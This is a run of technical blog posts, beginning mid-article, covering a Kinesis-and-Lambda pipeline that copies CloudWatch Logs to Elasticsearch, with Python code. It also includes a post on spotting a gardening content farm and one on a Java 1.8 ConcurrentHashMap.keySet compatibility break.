<p> The first step in streaming your CloudWatch Logs is to create a subscription. As I mentioned in my last post, you can't do this via the AWS Console. The <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/SubscriptionFilters.html#DestinationKinesisExample" target="_blank">Amazon documentation</a> walks you through creating the subscription via the CLI, or you can use the CloudFormation template from my project.
<p> One important note: the stream has to be active before you can create a subscription; if you create the stream and then immediately try to create the subscription, it will fail. This is why I have separate templates to create the stream and subscribe to it (it's also easier to replicate the subscription when it's a separate template).
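<p> If you're scripting the setup yourself rather than using CloudFormation, a polling
loop like this sketch (using boto3; the stream name matches the example below) avoids
that failure:
<pre class="codeSample">
import time
import boto3

kinesis = boto3.client('kinesis')

def wait_for_stream(stream_name, timeout=120):
    """ Polls the stream's status, returning once it's active;
        raises if the timeout expires. """
    deadline = time.time() + timeout
    while time.time() < deadline:
        desc = kinesis.describe_stream(StreamName=stream_name)
        if desc['StreamDescription']['StreamStatus'] == 'ACTIVE':
            return
        time.sleep(5)
    raise RuntimeError(f'stream {stream_name} never became active')

wait_for_stream('CloudWatchSubscriptionDestination')
</pre>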
<p> The messages are written to the stream as JSON. Each message identifies the log group and stream, and contains a list of log events:
<pre class="codeSample">
{
    "messageType": "DATA_MESSAGE",
    "owner": "012345678901",
    "logGroup": "AppenderExample",
    "logStream": "Example-20190825",
    "subscriptionFilters": ["CloudWatchSubscription-Subscription-184MSZXRD5MCP"],
    "logEvents": [
        {
            "id": "34939504216003552676187468284442890586332374987778818048",
            "timestamp": 1566741555269,
            "message": "some message\n"
        },
        {
            "id": "34939504216092755656981590777009033459422968433802739713",
            "timestamp": 1566741555273,
            "message": "another message\n"
        },
        {
            "id": "34939504239575440351034336945046144800521693099600117762",
            "timestamp": 1566741556326,
            "message": "still another\n"
        }
    ]
}
</pre>
<h1> Processing the input messages </h1>
<p> When Kinesis invokes a Lambda, it packages multiple records into a single invocation event, with the original message GZipped and Base64-encoded:
<pre class="codeSample">
{
    "Records": [
        {
            "kinesis": {
                "kinesisSchemaVersion": "1.0",
                "partitionKey": "ea05911b7285b29393412d960053f81d",
                "sequenceNumber": "49598889268738564796327312231530438478076180289718059010",
                "data": "H4sIANoVbV0AA42QW2vCQBCFn5NfIfusMLs7e5m+BbU+CaURWtpKSXXRQExCsvaC+N+7sSn0QqUvC7PnMOebc4gjtnNtm23c4q127GLAJskieZxP0zSZTdkw6NVL6ZpOAS4kKm0sAT8pRbWZNdW+7sSkrl25ds30NdvVhfvUU9+4bNcZemEkgBNYoU6Odv/Urpq89nlVXuaFd00bvPdsXFT79U3mV9v0i2P0beAW5+nd7fVEzcdXbNkHTp9d6U9LDnEUsXzdZUskSQpQcA0glRLaaG4NaissIopwkbJaSiENkjXGWMstoO0YI+bzUJEP9GEVV1ob5KrbQSe1r6+LaaudG/TzQ8ni6Dgc/EFBwiillSbLFUFIBCCQoV5CIUhblNKCMJIMl2cpjPxJkZWV37rmPyDhNQoxVMJBhkhNGL41R7QAKnCSBKLQGefGaHEGREuhf9Xh86IY9DgfGMv4GL8DWgIaCnQCAAA=",
                "approximateArrivalTimestamp": 1566741561.188
            },
            "eventSource": "aws:kinesis",
            "eventVersion": "1.0",
            "eventID": "shardId-000000000000:49598889268738564796327312231530438478076180289718059010",
            "eventName": "aws:kinesis:record",
            "invokeIdentityArn": "arn:aws:iam::012345678901:role/DefaultLambdaProfile",
            "awsRegion": "us-east-1",
            "eventSourceARN": "arn:aws:kinesis:us-east-1:012345678901:stream/CloudWatchSubscriptionDestination"
        },
        ...
    ]
}
</pre>
<p> To transform the input events, you need to iterate over each of the top-level records, extract its payload, and then iterate over each of the child events to transform them. In order to simplify the output code, my <code>process_input_record()</code> function returns just the transformed child events, so that the output code can work on a “flattened” array.
<pre class="codeSample">
def lambda_handler(event, context):
    outputMessages = []
    for record in event['Records']:
        outputMessages = outputMessages + process_input_record(record)
    logging.info(f'total number of messages to output: {len(outputMessages)}')
    logging.debug(f'output messages: {json.dumps(outputMessages)}')
    write_to_kinesis(outputMessages)


def process_input_record(record):
    try:
        payload = record['kinesis']['data']
        decoded = gzip.decompress(base64.b64decode(payload))
        data = json.loads(decoded)
        message_type = data.get('messageType')
        if message_type == 'DATA_MESSAGE':
            logGroup = data['logGroup']
            logStream = data['logStream']
            events = data.get('logEvents', [])
            logging.info(f'processing {len(events)} events from group "{logGroup}" / stream "{logStream}"')
            logging.debug(f'input messages: {json.dumps(events)}')
            return [transform_log_event(logGroup, logStream, event) for event in events]
        elif message_type == 'CONTROL_MESSAGE':
            logging.info('skipping control message')
        elif message_type:
            logging.warn(f'unexpected message type: {message_type}')
    except:
        logging.error(f'failed to process record; keys = {record.keys()}', exc_info=True)
    # fall-through for any unprocessed messages (exception or unhandled message type)
    return []
</pre>
<p> One thing to note about <code>process_input_record()</code> is the <code>if</code> statement at its core. CloudWatch Logs writes two different types of messages: most of the messages are data messages, which contain log events. However, when you first subscribe the log group to a stream, it writes a control message to verify that it has permission to do so. There shouldn't be any other message types, but if AWS adds one we'll ignore it. I also wrap the entire function in a try block, in case something other than a valid Logs message ends up on the stream.
<p> Each event in the record gets passed through <code>transform_log_event()</code> (not shown in full here, but sketched after this list), which performs the following transformations:
<ul>
<li> If the message isn't already JSON, it's transformed into JSON with <code>timestamp</code>, <code>message</code>, and <code>level</code> fields. This makes the message compatible with those written by my logging adapter.
<li> If the message looks like a Lambda status message, it's parsed, and relevant data (eg, request ID, execution duration, and memory used) is extracted and stored in a child object.
<li> If the message looks like <a href="https://docs.aws.amazon.com/lambda/latest/dg/python-logging.html" target="_blank">Lambda logging output</a>, it is parsed and the components (level, timestamp, request ID, and message) are stored in separate fields. <em>Note:</em> my transform only supports Python log output; the Node.JS runtime outputs fields in a different order.
<li> The source log group and stream are added, as a sub-object.
</ul>
<p> If you want to add your own transformations — such as support for Node.JS logs — this is the place to do it.
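<p> For reference, here's a simplified sketch of the function's overall shape; the
Lambda-specific parsing is elided, and the real implementation in the repository differs
in its details:
<pre class="codeSample">
def transform_log_event(logGroup, logStream, event):
    message = event['message'].strip()
    try:
        # if the message is already a JSON object, pass it through unchanged
        data = json.loads(message)
        if not isinstance(data, dict):
            raise ValueError('scalar JSON value')
    except (json.JSONDecodeError, ValueError):
        # otherwise, wrap it; this is also where the real code parses
        # Lambda status reports and Lambda logging output
        data = {
            # assumes "from datetime import datetime" at module level
            'timestamp': datetime.utcfromtimestamp(event['timestamp'] / 1000).isoformat() + 'Z',
            'level':     'INFO',
            'message':   message
        }
    data['source'] = {
        'logGroup':  logGroup,
        'logStream': logStream
    }
    return data
</pre>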
<h1> Writing messages to Kinesis </h1>
<p> As I've written elsewhere, writing to Kinesis is easy to do, but difficult to do right:
<ul>
<li> For performance, you should use the <code>PutRecords</code> API rather than <code>PutRecord</code>.
<li> Which means that you must create batches of records that fit into the limits of this API (at most 500 records per request; each record is limited to 1 MB, and the entire request to 5 MB).
<li> You have to be prepared for your entire call to be throttled, and resend after a delay.
<li> And you have to be prepared for individual records within the batch to be throttled due to load on the destination shard, and resend just them.
</ul>
<p> The top-level <code>write_to_kinesis()</code> function repeatedly processes batches of records, with a sleep between batches to minimize throttling. The <code>process_batch()</code> function returns any messages that it couldn't send, for the next time through the loop. As I note, there shouldn't be more than one batch, unless you've configured the Lambda trigger to process lots of records or your destination is overloaded.
<pre class="codeSample">
def write_to_kinesis(listOfEvents):
    records = prepare_records(listOfEvents)
    while records:
        records = process_batch(records)
        if records:
            time.sleep(2)   # an arbitrary sleep; we should rarely hit this
    return
</pre>
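<p> <code>prepare_records()</code> isn't shown in this post. Conceptually, it just turns
each JSON message into an entry for <code>PutRecords</code>; here's a sketch, with an
arbitrary choice of partition key:
<pre class="codeSample">
import uuid   # json is already imported at module level

def prepare_records(listOfEvents):
    records = []
    for message in listOfEvents:
        records.append({
            'Data': json.dumps(message).encode('utf-8'),
            'PartitionKey': str(uuid.uuid4())   # arbitrary: spreads messages across shards
        })
    return records
</pre>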
<p> The <code>process_batch()</code> function is small but needs the most explanation. It starts with a call to <code>build_batch()</code>, which splits the source list of records into two parts: the first part contains all of the records that will fit in a single <code>PutRecords</code> call, the second is everything left over (a sketch of this function appears after the listing). Next is the actual call. Finally, <code>process_response()</code> looks at the result of the call to find any records that were throttled; these are added to the leftovers and returned, so that they'll be retried on the next pass through the loop.
<pre class="codeSample">
def process_batch(records):
    toBeSent, toBeReturned = build_batch(records)
    logging.info(f'sending batch of {len(toBeSent)} records with {len(toBeReturned)} remaining')
    try:
        response = kinesisClient.put_records(
            StreamName=kinesisStream,
            Records=toBeSent
        )
        return process_response(response, toBeSent) + toBeReturned
    except kinesisClient.exceptions.ProvisionedThroughputExceededException:
        logging.warn(f'received throughput exceeded on stream {kinesisStream}; retrying all messages')
        return toBeSent + toBeReturned
</pre>
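<p> <code>build_batch()</code> isn't shown in the post either; here's a sketch of the
behavior described above (the implementation in the repository may differ):
<pre class="codeSample">
def build_batch(records):
    # conservative limits: stay at or below 500 records and 1 MB of data,
    # well within what PutRecords accepts
    batch = []
    batchSize = 0
    for ii, record in enumerate(records):
        recordSize = len(record['Data']) + len(record['PartitionKey'])
        if batch and (len(batch) == 500 or batchSize + recordSize > 1024 * 1024):
            return batch, records[ii:]   # everything else waits for the next pass
        batch.append(record)
        batchSize += recordSize
    return batch, []
</pre>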
<p> I'm going to wrap up by looking at the <code>process_response()</code>, function in detail, because it's where the trickiness lies. The response for <code>PutRecords</code> contains an array of result objects, matched to the request records that you passed in. In the happy path, each of these result objects contains the sequence number that Kinesis assigned to the record (and <code>FailedRecordCount</code> is 0). In the unhappy path, some of the records fail but others succeed; the result object for the failed records will contain an error code.
<p> Making things a little more tricky, this error code can either indicate that the shard throttled the record, in which case we re-send it, or an internal error happened. The <a href="https://docs.aws.amazon.com/kinesis/latest/APIReference/API_PutRecords.html" target="_blank">API docs</a> don't go into details on exactly what an internal error is, or whether it's recoverable, so I assume that it isn't and drop the record.
<pre class="codeSample">
def process_response(response, records):
    if response['FailedRecordCount'] == 0:
        return []

    result = []
    droppedRecordCount = 0
    for ii in range(len(response['Records'])):
        entry = response['Records'][ii]
        errorCode = entry.get('ErrorCode')
        if errorCode == 'ProvisionedThroughputExceededException':
            result.append(records[ii])
        elif errorCode:
            droppedRecordCount += 1

    if droppedRecordCount > 0:
        logging.warn(f'dropped {droppedRecordCount} records due to Kinesis internal errors')
    if len(result) > 0:
        logging.info(f"requeueing {len(result)} records due to throughput-exceeded")

    return result
</pre>
<p> So, that's it. With a few adjustments to match your logging format (and really, if you can, just log in JSON), this will let you centralize your logs in Elasticsearch, even if AWS really, really wants you to use CloudWatch.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-66504881642704584922019-09-11T07:18:00.001-04:002019-09-11T07:18:41.359-04:00Streaming CloudWatch logs to Elasticsearch, Part 1: The Problem<p> My <a href="https://www.kdgregory.com/index.php?page=aws.loggingPipeline" target="_blank"> preferred approach to application logging on AWS</a> is based around two ideas: first, that applications produce log messages in JSON, and second, that those messages are written directly to a Kinesis stream, which is then sent to Elasticsearch via Kinesis Firehose.
<p> Amazon's preference, however, is <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/WhatIsCloudWatchLogs.html" target="_blank">CloudWatch Logs</a>: it's the default log destination for AWS Batch and Lambda — indeed, you have to explicitly disable access to <em>stop</em> Lambda logging to CloudWatch; there's an agent for EC2; and the <code>awslogs</code> driver for Docker (ECS, EKS, or on-prem). Unfortunately, while CloudWatch Logs has come a long way from its original feature set, it still doesn't measure up to Elasticsearch. And in a multi-application environment, you don't want <em>two</em> centralized log services.
<p> So what to do?
<p> One answer is to use an alternative logging framework and bypass CloudWatch Logs. This can work, but you'll lose useful information such as the Lambda execution report. And <a href="http://blog.kdgregory.com/2019/01/multi-threaded-programming-with-aws.html" target="_blank">as I discovered</a>, any logging framework that uses a background thread to write log messages (which is usually a Good Thing) will run into problems when Lambda freezes the execution context.
<p> A better answer is to use a <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Subscriptions.html" target="_blank">CloudWatch Logs subscription</a>, in which a log group sends regular batches of messages to a variety of destinations. However, there are a surprising number of pitfalls with subscriptions. This post looks at the different subscription types and the pros and cons associated with each. My next post details an implementation that copies CloudWatch Logs into an existing Kinesis-based pipeline, from which they end up in Elasticsearch.
<p> This should be simple: if you use the AWS Console, you'll even see an option to subscribe a log group directly to Amazon Elasticsearch, which seems like the “no-brainer” choice. But after trying it out I consider it completely unsuitable: it sends updates multiple times per second, apparently with duplicates (because I wasn't writing that many messages in my tests). And Elasticsearch <em>hates</em> frequent small updates.
<p> A second option, also available from the Console, is to invoke a Lambda. <a href="https://github.com/kdgregory/aws-misc/tree/7b82a3bcd4bed3f394924e32939b75fb6cc9fe19/lambda/cloudwatch-logs-to-kinesis" target="_blank">I first went down this path</a>, with a Lambda that would write log messages to a Kinesis stream; from there they would be picked up by my existing pipeline. However, I abandoned this approach because, again, the Lambda was invoked <em>a lot</em>: it appears that CloudWatch invokes it as soon as events are logged, rather than attempting to batch them. With a moderately active log stream, this translates to over two million invocations per stream per month.
<p> There are two additional subscription options that aren't available from the Console: Kinesis Streams and Kinesis Firehose. Both use a similar format: each record written to the stream/firehose identifies the source log group and stream, with an array of zero or more log events. This rules out Firehose, which expects a 1:1 relationship between the records that it reads and the records that it writes.
<p> That left me with subscribing a Kinesis Stream, then attaching a Lambda to that stream to process the records. While this approach had a few more moving parts than I would like, it let me reuse most of my existing firehose architecture: the Lambda could write individual messages into the same Kinesis stream used for direct application logging, where they would be picked up by Firehose. And because you can specify the number of messages in a Kinesis-Lambda trigger, it meant that the number of invocations could be tuned. So all-in-all, a win.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-61890030773934399602019-07-22T06:57:00.000-04:002019-07-22T07:07:13.326-04:00Trying not to fertilize a content farm<p> I got an email this week from a person purporting to be the webmaster of a gardening
website, asking if I would link to his page about growing buckwheat at home, from my
page about buckwheat pancakes. The email seemed a little strange: it looked like a
form letter with inserted fields. And there was a link at the bottom to unsubscribe.
That's not something that I'd expect from a hobbyist looking to increase his connections.
<p> But, rather than just ignore the email, I decided to do some investigation. If you'd
like to play along at home, you'll find the site at “the daily gardener”
— for obvious reasons, I don't want to insert a link or anything like a link,
but I'm sure you can figure it out. Beware: while it has innocuous content today,
it may not in six months; I visited using a guest account on my home Linux box, and
deleted the browser's config afterward.
<p> As I said, it has innocuous content. In fact, for a likely content farm, it has
pretty good content: easily digestible chunks of information and lots of pictures.
In other words, consistent with most of the gardening sites that I've seen.
<p> There were, however, a few red flags. The first was that certain sentence phrasings
were not those of a native English speaker. That, however, could just be the result
of editing (I know that I've left some bizarre sentences online after deleting and
re-arranging words). The second red flag was that the word “daily” in the
title really did mean daily: there was a new long-form article published every day.
That too could be explained: the profile picture showed someone who appeared to be
post-retirement; he could craft content full-time.
<p> A third red flag was that there were very few outbound links. This is another place
where my experience is not necessarily relevant: while I put a lot of outbound links
on my site to provide the reader with more information, not everybody does. But
most of the gardening sites that I looked at do. And since he was asking me to link
to his site, you'd think he'd be doing the same.
<p> None of these red flags were convincing, so my next step was to take arbitrary
sentences from his pages and put them into Google. In the past I've done this to find
people who are pirating content from my site, and have issued several DMCA takedown
requests as a result: people who put together pastiches tend not to change their
source material. Surprisingly, it took a half-dozen attempts before I found almost-exact
text from another site (which made me wonder whether most of the site's text was generated
by a bot).
<p> By now I was pretty much convinced this site was a content farm, so I explored its
history. First stop was <code>whois</code>, which told me that the domain had been
registered in 2005. Hmm, but all of the content looks new.
<p> Next stop was the <a href="https://archive.org/web/" target="_blank">Wayback Machine</a>,
to look at how the site changed over the years. And what I discovered was that it was
originally an online store, and remained so until the domain expired at the end of 2018.
And then in April of 2019, the site was revived with a new look and new content.
<p> Last up was a Google image search, using the picture from the “About Us”
page. And, in addition to multiple links to “his” site, there was a link to
Shutterstock. OK, that pretty much seals it.
<p> After doing this research, I did some searches to find out if there was anything else
that I should have looked for. And was surprised that there were very few “how
to spot a content farm” articles available (one of the better ones is from
<a href="http://researchguides.austincc.edu/c.php?g=435086&p=2965633"
target="_blank">Austin Community College</a>, apparently to keep students from using
such sites as citations). Most of the articles were about how content farms don't work,
and that Google actively penalizes them. But if you search for “growing
buckwheat” you will find the daily gardener site on the first page of results;
perhaps it's too new to have triggered alarms.
<p> And there is one thing that I find really strange about this site: there weren't any ads.
That is — or has been — the main reason for content farms: get people on the
site and hope that they click an ad. But not here. Nor did the network tab on my browser
show any activity after page load, so it wasn't (when I looked) some sort of click scam.
<p> So what's the goal? Is this a “long con” approach to black-hat SEO? Are
they building traffic before turning the site into something nasty?
<p> I don't know, but I won't be linking to it.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-5297325827637004392019-07-19T07:31:00.002-04:002019-07-19T07:33:09.928-04:00Broken Backwards Compatibility: The Bane of the Library Developer<p> Backwards compatibility has long been a hallmark of Java: there are many classes
and methods still in the standard library even though they've been deprecated
since the 1990s. Imagine my surprise, then, when I saw this exception:
<pre class="codeSample">
java.lang.NoSuchMethodError: java.util.concurrent.ConcurrentHashMap.keySet()Ljava/util/concurrent/ConcurrentHashMap$KeySetView;
at net.sf.kdgcommons.util.Counters.keySet(Counters.java:179)
...
</pre>
<p> To understand why, you need some back-story. I maintain a couple of open-source
libraries that I claim are compatible with Java 1.6. To ensure that I don't
accidentally use methods that didn't exist in 1.6, I have a 1.6 JVM installed
on my development machine, and tell Eclipse to use it to compile the project.
Ditto for the library that was running this test.
<p> However, I <em>don't</em> use the real 1.6 JDK for producing the released versions of these
libraries. I use Maven for releases, and the newer versions of Maven won't run on anything
older than JDK 1.8 (and there are enough backwards-incompatibilities between older versions
of Maven and its plugins that trying to use one is an exercise in frustration). This means
that, even though I'm setting my <code>target</code> property to 1.6, the compiler is resolving
classes against the 1.8 standard library: <code>source</code> and <code>target</code> control
only the language level and bytecode version, not which class library you compile against.
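<p> For illustration, a <code>maven-compiler-plugin</code> configuration along these lines (the version number is an example, not from my actual POM) shows the trap; nothing in it pins the compile-time class library:
<pre class="codeSample">
<plugin>
    <groupId>org.apache.maven.plugins</groupId>
    <artifactId>maven-compiler-plugin</artifactId>
    <version>3.8.1</version>
    <configuration>
        <source>1.6</source>
        <target>1.6</target>
        <!-- without a bootclasspath pointing at a real 1.6 rt.jar, javac
             resolves classes against whatever JDK Maven itself runs on -->
    </configuration>
</plugin>
</pre>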
<p> And in 1.8, the Java maintainers changed the return type of <code>ConcurrentHashMap.keySet()</code>:
<a href="https://docs.oracle.com/javase/6/docs/api/java/util/concurrent/ConcurrentHashMap.html"
target="_blank">previously</a>, it returned a <code>Set</code>, as defined by the contract
of <code>java.util.Map</code>. In
<a href="https://docs.oracle.com/javase/8/docs/api/java/util/concurrent/ConcurrentHashMap.html"
target="_blank">1.8</a>, it returns a <code>ConcurrentHashMap.KeySetView</code>. This concrete
class implements <code>Set</code>, so it doesn't break the contract at the source level.
<p> However, things are different at the bytecode level: the actual return type is retained in the
method's <a href="https://docs.oracle.com/javase/specs/jvms/se8/html/jvms-4.html#jvms-4.3.3"
target="_blank">descriptor</a>, and the
<a href="https://docs.oracle.com/javase/specs/jvms/se8/html/jvms-6.html#jvms-6.5.invokevirtual"
target="_blank">invokevirtual</a> operation attempts to find a defined method that
matches that descriptor. It will accept a method definition that returns a subtype of the
specified return type, but not one that returns a supertype. So, when presented with a version
of that standard library in which <code>keySet()</code> returns a <code>Set</code>, the JVM
throws <code>NoSuchMethodError</code>.
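<p> You can reproduce this with a trivial program (class and variable names are mine, for illustration): compile it against a 1.8 JDK with <code>-source 1.6 -target 1.6</code>, then run it on a 1.6 JRE.
<pre class="codeSample">
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;

public class KeySetDemo
{
    public static void main(String[] argv)
    {
        ConcurrentHashMap<String,Integer> map = new ConcurrentHashMap<String,Integer>();
        map.put("foo", 1);

        // compiled against the 1.8 library, this call's descriptor names
        // KeySetView; a 1.6 runtime has no method matching that descriptor
        Set<String> keys = map.keySet();
        System.out.println(keys);
    }
}
</pre>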
<p> There is a work-around: cast the map reference to <code>java.util.Map</code>. This causes the
compiler to use the method definition from the interface, which fortunately has not changed
since it was released in 1.2.
<pre class="codeSample">
ConcurrentHashMap<K,V> map = // something
// the cast makes the compiler emit the descriptor declared by java.util.Map,
// which is the same in every version of the standard library
Set<K> keys = ((Map<K,V>)map).keySet();
</pre>
<p> There is a <a href="https://bugs.openjdk.java.net/browse/JDK-8151366" target="_blank">bug
report</a> for this behavior, which was closed with “Won't Fix”. Unfortunately,
that's the correct resolution: reverting the method signature would not only break source code
that relies on the new return type, but also any deployed applications compiled against the
1.8 signature and running on a JVM with the reverted one.
<p> I can only hope that, in reviewing the bug report, the JVM maintainers realized that
changing the public API of a class — any class — is a mistake. Unfortunately,
some of the changes happening with newer releases of Java indicate that this will be a more
frequent occurrence. Which is probably why 1.8 remains (in my experience) the primary
deployment platform for Java apps, even though we're now at Java 12.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0